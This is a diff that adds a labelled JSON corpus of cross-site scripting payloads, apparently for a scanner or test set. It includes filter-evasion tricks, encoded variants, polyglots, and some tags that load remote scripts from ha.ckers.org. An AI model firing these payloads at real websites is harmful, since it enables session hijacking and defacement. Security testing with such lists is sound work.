"xss_payloads_quick" + } + }, + { + "payload": "<form><button formaction=\"javascript:alert(1)\">//INJECTX", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<svg onload=(alert)(1) >//INJECTX", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<script>$=1,alert($)</script>//INJECTX", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<!--<img src=\"--><img src=x onerror=alert(1)//\">//INJECTX", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<img/src='x'onerror=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<marguee/onstart=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<script>alert(1)//INJECTX", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<script>alert(1)<!--INJECTX", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "xss_payloads_quick" + } + }, + { + "payload": "<SCRIPT>alert('XSS');</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<IMG SRC=javascript:alert(&quot;XSS&quot;)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<SCRIPT>a=/XSS/", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<IMG SRC=\"mocha:[code]\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "getURL(\"javascript:alert('XSS')\")", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<HTML><BODY>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "html", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<? echo('<SCR)';", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "RSNAKE_XSS" + } + }, + { + "payload": "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e", + "category": "xss", + "metadata": { + "type": "polyglot", + "context": "href", + "severity": "high", + "source": "XSS_Polyglots" + } + }, + { + "payload": "%3Cimg/src=%3Dx+onload=alert(2)%3D", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "48e71%3balert(1)//503466e3", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "';confirm('XSS')//1491b2as", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "a29b1%3balert(888)//a62b7156d82", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<scr&#x9ipt>alert('XSS')</scr&#x9ipt>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "\"onmouseover%3dprompt(941634)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "%f6%22%20onmouseover%3dprompt(941634)%20", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "\" onerror=alert()1 a=\"", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "style=xss:expression(alert(1))", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<input type=text value=“XSS”>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "A” autofocus onfocus=alert(“XSS”)//", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<input type=text value=”A” autofocus onfocus=alert(“XSS”)//”>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<a href=\"javascript:alert(1)\">ssss</a>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<%00script>alert(‘XSS’)<%00/script>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<%script>alert(‘XSS’)<%/script>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<%tag style=”xss:expression(alert(‘XSS’))”>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<%tag onmouseover=\"(alert('XSS'))\"> is invalid. <%br />", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "</b style=\"expr/**/ession(alert('vulnerable'))\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "alert(a.source)</SCRIPT>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "exp/*<A STYLE='no\\xss:noxss(\"*//*\");", + "category": "xss", + "metadata": { + "type": "generic", + "context": "style", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<!--[if gte IE 4]>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<![endif]-->", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "d=\"alert('XSS');\\\")\";", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "eval(a+b+c+d);", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<HTML xmlns:xss>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<xss:xss>XSS</xss:xss>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "</HTML>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></XML>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<XML SRC=\"xsstest.xml\" ID=I></XML>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<?import namespace=\"t\" implementation=\"#default#time2\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\">", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "</BODY></HTML>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "XSSDetection" + } + }, + { + "payload": "<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "<", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "XSSDetection" + } + }, + { + "payload": "(alert)(1)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-JS" + } + }, + { + "payload": "a=alert,a(1)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-JS" + } + }, + { + "payload": "eval(URL.slice(-8))>#alert(1)", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "high", + "source": "BRUTELOGIC-XSS-JS" + } + }, + { + "payload": "innerHTML=location.hash>#<script>alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "BRUTELOGIC-XSS-JS" + } + } +] \ No newline at end of file